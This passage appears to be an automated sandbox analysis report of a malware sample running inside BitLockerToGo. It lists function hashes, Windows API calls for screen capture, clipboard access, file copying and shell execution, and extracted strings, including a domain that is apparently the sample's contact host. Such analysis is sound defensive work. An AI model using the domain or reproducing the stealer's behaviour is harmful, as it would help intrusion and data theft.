• Opcode ID: 1b0f1440dc0fa9025065666765f27c91c3b8525b7be54efba2bc4527c6656d71
• Instruction ID: 5bdc67afd1bde314a650b6f36decfface19dcbc0d6ae9af54b624d83bc5720f4
• Opcode Fuzzy Hash: 1b0f1440dc0fa9025065666765f27c91c3b8525b7be54efba2bc4527c6656d71
• Instruction Fuzzy Hash: DAD048743E8300B6F2340B48AC07F043110A302F22F700364F3207C2E08AE031019A6D
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043DADB
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 94a17b276a87613f611fa3253c375c9f7ab6d74ea5cf1adef94027d786bfcf13
• Instruction ID: b66404a8562981d389c2e45b4d4f17b20996c760ea210aa5d99397a2825b418a
• Opcode Fuzzy Hash: 94a17b276a87613f611fa3253c375c9f7ab6d74ea5cf1adef94027d786bfcf13
• Instruction Fuzzy Hash: A8C09B332441045FD9011F48FC057457B51EF9037AF240076F20D44072C113D47BD785
APIs
• CoInitialize.OLE32(00000000), ref: 00410EE1
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: bbd77bbbaa78ab2fd35300d1c21581c4fac3a16d396d5e7349d72c7064b746c3
• Instruction ID: 3886785bc919117983b5e2e65c9cc7ead0b4095c3f446d394963118649a368ad
• Opcode Fuzzy Hash: bbd77bbbaa78ab2fd35300d1c21581c4fac3a16d396d5e7349d72c7064b746c3
• Instruction Fuzzy Hash: F8C08C20428108ABF210272EAC0AF83392CE703726F400330B5E0400D1AE206815D5FB
APIs
  • Part of subcall function 004354A0: GetDC.USER32(00000000), ref: 004354A9
  • Part of subcall function 004354A0: GetSystemMetrics.USER32(0000004C), ref: 004354B9
  • Part of subcall function 004354A0: GetSystemMetrics.USER32(0000004D), ref: 004354C1
  • Part of subcall function 004354A0: GetCurrentObject.GDI32(00000000,00000007), ref: 004354CA
  • Part of subcall function 004354A0: GetObjectW.GDI32(00000000,00000018,?), ref: 004354DA
  • Part of subcall function 004354A0: DeleteObject.GDI32(00000000), ref: 004354E9
  • Part of subcall function 004354A0: CreateCompatibleDC.GDI32(00000000), ref: 004354F0
  • Part of subcall function 004354A0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004354FB
  • Part of subcall function 004354A0: SelectObject.GDI32(00000000,00000000), ref: 00435507
  • Part of subcall function 004354A0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043552E
• CoUninitialize.OLE32 ref: 00411806
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
• String ID: &A-C$,%"3$5Q<S$6E+G$7U9W$8]S_$<?$<Y?[$>M"O$E-A/$GuD$I)^+$M%E'$O9M;$P!N#$eI?K$gjzF$htr^$il~l$jabc$jxdV$kbe;$sergei-esenin.com${`st
• API String ID: 3213364925-889322202
• Opcode ID: 622ff4342a46816667bb6ab0709b25f33cb09700fe0beee6a95200916cb37c7f
• Instruction ID: 36dcdd82a7f83c00345b3f5b4ec2262732fa0cd4334e380ffb4ab3e4d33bf01d
• Opcode Fuzzy Hash: 622ff4342a46816667bb6ab0709b25f33cb09700fe0beee6a95200916cb37c7f
• Instruction Fuzzy Hash: 81C1FDB050C3D18BD334CF2584907EBBFE1AF96344F18896ED4C99B252D339854ACB9A
APIs
• GetDC.USER32(00000000), ref: 004354A9
• GetSystemMetrics.USER32(0000004C), ref: 004354B9
• GetSystemMetrics.USER32(0000004D), ref: 004354C1
• GetCurrentObject.GDI32(00000000,00000007), ref: 004354CA
• GetObjectW.GDI32(00000000,00000018,?), ref: 004354DA
• DeleteObject.GDI32(00000000), ref: 004354E9
• CreateCompatibleDC.GDI32(00000000), ref: 004354F0
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004354FB
• SelectObject.GDI32(00000000,00000000), ref: 00435507
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043552E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
• String ID: ~v
• API String ID: 1298755333-1224970894
• Opcode ID: 2710fc76ac39a7e4136b70b69dccefce0c7633cc697c2282086f9d5922e30ccb
• Instruction ID: e54191557be699bff73bfda36a86c59336cf228f46f3af899c14f39e48e605c4
• Opcode Fuzzy Hash: 2710fc76ac39a7e4136b70b69dccefce0c7633cc697c2282086f9d5922e30ccb
• Instruction Fuzzy Hash: 1981E43A519310EFD7005F74AC95B2B7BA8FF8E362F440C2DF68293251D37999068B66
Strings
Yara matches
Similarity
• API ID:
• String ID: 9$<$<$<$>$>$>$?$?$B$G$H$R$]$]$a$b$l$r
Strings
Yara matches
Similarity
• API ID:
• String ID: ($0$3$<$>$@$E$a$a$b$d$m$o$t$x$z$|$}
Strings
Yara matches
Similarity
• API ID:
• String ID: &@>T$)S$Q$;(4M$>PFp$GuD$8t$_]
APIs
• CopyFileW.KERNEL32(?,hxufvd;H=Qm}y`pb,00000000,00000001,00000001), ref: 0042B005
Strings
Yara matches
Similarity
• API ID: CopyFile
• String ID: ,O$M$/G/E$=Qm}$hxuf$hxufvd;H=Qm}y`pb$m`he$vd;H$y`pb
Strings
Yara matches
Similarity
• API ID:
• String ID: 5:',$CFGD$DE$HuGG$J^Lv$Q_T\$SNK~$V]E^$^d^c$r!o#${%g'
Strings
Yara matches
Similarity
• API ID:
• String ID: -,`f$<$<0bb$=`zo$MQOH$SQMP$TPFR$bcw"$cngj$h0Zv$r
Strings
Yara matches
Similarity
• API ID:
• String ID: $6B$%:B$71B$@2B$E9B$J4B$_4B$q3B$q3B$3B
Strings
Yara matches
Similarity
• API ID:
• String ID: )*+$$-670$4$9:;;$ADD!$MNOH$hi$p$yz{t
Strings
Yara matches
Similarity
• API ID:
• String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
APIs
Strings
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DrivesLogical
                                                                                                                                                                                        • String ID: 2vB$>u{$SQ$W@$]wB
                                                                                                                                                                                        • API String ID: 999431828-1484276304
                                                                                                                                                                                        • Opcode ID: c99e03e63bb59b9db395fd0fa9c35ea9ec86fba2d9b7a966b2c4d6aede12bb2c
                                                                                                                                                                                        • Instruction ID: 5017136d9af59afada69a8d8b8d3279e8dce1753646a9e56419c6b978a1eb149
                                                                                                                                                                                        • Opcode Fuzzy Hash: c99e03e63bb59b9db395fd0fa9c35ea9ec86fba2d9b7a966b2c4d6aede12bb2c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CD1C9B460C3508FD314DF15E89162BBBE1EF92354F448A1DF4D69B391E7B88905CB8A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,4FDE49DB,0044758A,?,00000000,00000005), ref: 0040E166
                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,4FDE49DB,0044758A,?,00000000,00000005), ref: 0040E246
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ExecuteShell
                                                                                                                                                                                        • String ID: Jwi$ Jwi$03$@A
                                                                                                                                                                                        • API String ID: 587946157-631218979
                                                                                                                                                                                        • Opcode ID: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                                                                                                                        • Instruction ID: 719729e5bd3b7bf6a0f222fbc426195e9f6861b77d8ea8eba2b75b34d4db9ccc
                                                                                                                                                                                        • Opcode Fuzzy Hash: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2041E77029C3408BD3248F65985578BBFF1ABD6724F044E2DE5D5AB3C1D7B884068F9A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 'O+M$+sq$7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/api$8$<?$APWE$APWE${+y
                                                                                                                                                                                        • API String ID: 0-390074210
                                                                                                                                                                                        • Opcode ID: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                                                                                                                        • Instruction ID: a5e9ad99a6abc216e060f8e326d44814c3342a23099fdf066d996cb67c7fb471
                                                                                                                                                                                        • Opcode Fuzzy Hash: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FD1277560D3908BD320CF25849036BBBE2ABD2704F19C93DE8D55B782D7798D0A8B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: /3M7$?tr$K0Ib$KtLI$XLBz$Z(*V$fim`$q_
                                                                                                                                                                                        • API String ID: 0-150372196
                                                                                                                                                                                        • Opcode ID: aae30c2cf5a17a276152600da2665cf81e2c8644b5c952e3f0a03da3bae6202a
                                                                                                                                                                                        • Instruction ID: 5198aafa245361afd4c434ba771b23a1f4d556de58515439c00a5c82cc35a444
                                                                                                                                                                                        • Opcode Fuzzy Hash: aae30c2cf5a17a276152600da2665cf81e2c8644b5c952e3f0a03da3bae6202a
                                                                                                                                                                                        • Instruction Fuzzy Hash: D291AE7190C3908BD321CF29D45075BFFE1AF96314F0889ADE4D59B382D379880ACB96
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1647500905-0
                                                                                                                                                                                        • Opcode ID: 90010e87969aa8808ec1d001f818ae175d346234814b74b2b0a97fff026261c4
                                                                                                                                                                                        • Instruction ID: e3ac008403cae3d161f0565e61e2e38b87bbf720fddabf510a696b7fe91a294e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 90010e87969aa8808ec1d001f818ae175d346234814b74b2b0a97fff026261c4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 054123B190CB80CFE714AB78C44836BBFE09B26315F14897EC4E647682D2BD9589C767
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0$0$0$@$i
                                                                                                                                                                                        • API String ID: 0-3124195287
                                                                                                                                                                                        • Opcode ID: ceedd92307ca5154f54f74983b84874e4e886e2e5e962be19e72f683998aca9b
                                                                                                                                                                                        • Instruction ID: b862f034f221e98106bc73402b63235ea6f990c049fe399508b27bff9f45a0b2
                                                                                                                                                                                        • Opcode Fuzzy Hash: ceedd92307ca5154f54f74983b84874e4e886e2e5e962be19e72f683998aca9b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2572E271A083428FC718CE28C59475BBBE1ABD9314F148A3EE8D5A73D1D778DD098B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: AJ$AJ$\]$`M$}t
                                                                                                                                                                                        • API String ID: 0-3506948131
                                                                                                                                                                                        • Opcode ID: dbe2fb993bac3670a11d0505a43ec6f7d5d3b1be7c7e68665c50607e30d1052a
                                                                                                                                                                                        • Instruction ID: b3dbc1111c1f5d25125a0287e7126fc93de9cce64f94811cf34d3af63b6d7073
                                                                                                                                                                                        • Opcode Fuzzy Hash: dbe2fb993bac3670a11d0505a43ec6f7d5d3b1be7c7e68665c50607e30d1052a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F3245B6E00214DFDB14CFA8D8912EEBBB1FF96310F48856DD445AB382E3789905CB95
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                        • API String ID: 0-1123320326
                                                                                                                                                                                        • Opcode ID: 63f3683fc18aa3d941e6f13d996163d9ffe9dda6134d9755ed4bf671525ece9a
                                                                                                                                                                                        • Instruction ID: 21cadf65c7769e63cb9efb29d9c788b6e62b7b8b90c1ec4be3ed8809db57933e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 63f3683fc18aa3d941e6f13d996163d9ffe9dda6134d9755ed4bf671525ece9a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D02927060C3428FC314CE29C49065BFBE2AFD9304F588A3EE8D5A7395D779D9498B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                        • API String ID: 0-3620105454
                                                                                                                                                                                        • Opcode ID: 72fb9ea5f64498536222b29e57accaaa6a6f11b0222b67828a656afa6e2a9c24
                                                                                                                                                                                        • Instruction ID: 8afc4e0bff92491430bd375e5e5080bbdc536b94bd936647b9b2b686ad4a9b61
                                                                                                                                                                                        • Opcode Fuzzy Hash: 72fb9ea5f64498536222b29e57accaaa6a6f11b0222b67828a656afa6e2a9c24
                                                                                                                                                                                        • Instruction Fuzzy Hash: 57E1A27160C7418FC315CF29C49065BFBE2AFD9304F48CA6EE8D997396D638D9098B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 21D$R1D$b0D$r0D
                                                                                                                                                                                        • API String ID: 0-3648752990
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: pz$t$xr$|<
• API String ID: 0-1407822990
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7eg$GB$~IdW$]_
• API String ID: 0-888033534
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 'O"A$>o)a$o7cI$w3k5
• API String ID: 0-858738269
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: `/${$~d
• API String ID: 2994545307-1854514315
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2,D$<ONQ$B)D
• API String ID: 0-2125771505
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 9qv0$l$x
• API String ID: 0-139331711
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: WS$Z[$iW
• API String ID: 0-4169752337
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$)$IEND
• API String ID: 0-588110143
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: e7w$mk$us
• API String ID: 0-596661717
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0123456789ABCDEFXP$0123456789abcdefxp$@
• API String ID: 0-1376090547
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: /;),$;#13
                                                                                                                                                                                        • API String ID: 0-423675788
                                                                                                                                                                                        • Opcode ID: b60c2e7c6d1b56676ba169865188e948f2fed177bcba08c6ae9394c4b6521799
                                                                                                                                                                                        • Instruction ID: aca944d4e23013e6281ce78edc78cf711290cb61668bc898aacbded1add03392
                                                                                                                                                                                        • Opcode Fuzzy Hash: b60c2e7c6d1b56676ba169865188e948f2fed177bcba08c6ae9394c4b6521799
                                                                                                                                                                                        • Instruction Fuzzy Hash: D7320275A00226CFDB14CF68EC50AAEB7B2FF4A315F5A8179D811A7390D735AC11CB94
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Inf$NaN
                                                                                                                                                                                        • API String ID: 0-3500518849
                                                                                                                                                                                        • Opcode ID: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                                                                                                                        • Instruction ID: ff09ee90d3e26bc8f89c40248453be00092e56fd331b09a0f2edf7984a1dbd5c
                                                                                                                                                                                        • Opcode Fuzzy Hash: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE1B6B6A083019BC704CF28C88161BBBE5EBC8750F158A3EF895A73D1D779DD458B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @A$turs
                                                                                                                                                                                        • API String ID: 0-1262509192
                                                                                                                                                                                        • Opcode ID: 71bc5a2eb015f4e6fd30a5d889349a39e999bccaa6fc099c322c40b034f6812b
                                                                                                                                                                                        • Instruction ID: 49dc033d6dbf70a531a5417f5ec258a52fbab98d97c3e76e9c844aca7102c5fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 71bc5a2eb015f4e6fd30a5d889349a39e999bccaa6fc099c322c40b034f6812b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EC14571A043209BD710EF28D88266BB7E1EF95314F5A892DE8C597381E338ED45C79A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: KJML$P
                                                                                                                                                                                        • API String ID: 0-1281581042
                                                                                                                                                                                        • Opcode ID: 6864d91a6bfef3863e490dac7609a2434bbcfa3df33c63e3b12fd9cc91fe95bd
                                                                                                                                                                                        • Instruction ID: c84c8ad5e36eccb623441b2d37765a8459fadb75eac3de7e9a24417d937c0de0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6864d91a6bfef3863e490dac7609a2434bbcfa3df33c63e3b12fd9cc91fe95bd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17C110316082214FE719CA18985072FB7E1EBC5714F55862EE8AA9F3D1CBB8DC46C7C5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D$B)D
                                                                                                                                                                                        • API String ID: 0-372517732
                                                                                                                                                                                        • Opcode ID: 205bb86f249f886410146e568ae15c38211d69c351eedfe3f2ce4ae89efb18fa
                                                                                                                                                                                        • Instruction ID: 1fa342f85b8ef9af1d040f909e923bd4db03789b12d09860a98adb9fa8d5d691
                                                                                                                                                                                        • Opcode Fuzzy Hash: 205bb86f249f886410146e568ae15c38211d69c351eedfe3f2ce4ae89efb18fa
                                                                                                                                                                                        • Instruction Fuzzy Hash: AA910039608311CFD304DF29E89066AB7E5FB8E314F0989BCE98993351D771E845CB89
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: KJML$KJML
                                                                                                                                                                                        • API String ID: 2994545307-1613884386
                                                                                                                                                                                        • Opcode ID: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                                                                                                                        • Instruction ID: 6da08042b9e43ed455c22ae99ea8e0b958d9f116125a2d0d2af920f562be82bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                                                                                                                        • Instruction Fuzzy Hash: C29139716083006BE724DB14CC51FBB77D1EF85314F58882EE589D73A1E738A881C75A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D$B)D
                                                                                                                                                                                        • API String ID: 0-372517732
                                                                                                                                                                                        • Opcode ID: bba222e9187541d307f423837e0a9759bc03d19576d75a8bb620746927279c26
                                                                                                                                                                                        • Instruction ID: d7ebadb32b627ee662257d4f662d33c7b57ad4f71a43a6d689c3f339b6192096
                                                                                                                                                                                        • Opcode Fuzzy Hash: bba222e9187541d307f423837e0a9759bc03d19576d75a8bb620746927279c26
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F81EF3660C314CFD308DF29E89066AB7E1FB8A314F09897CE98983351D775E905CB8A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
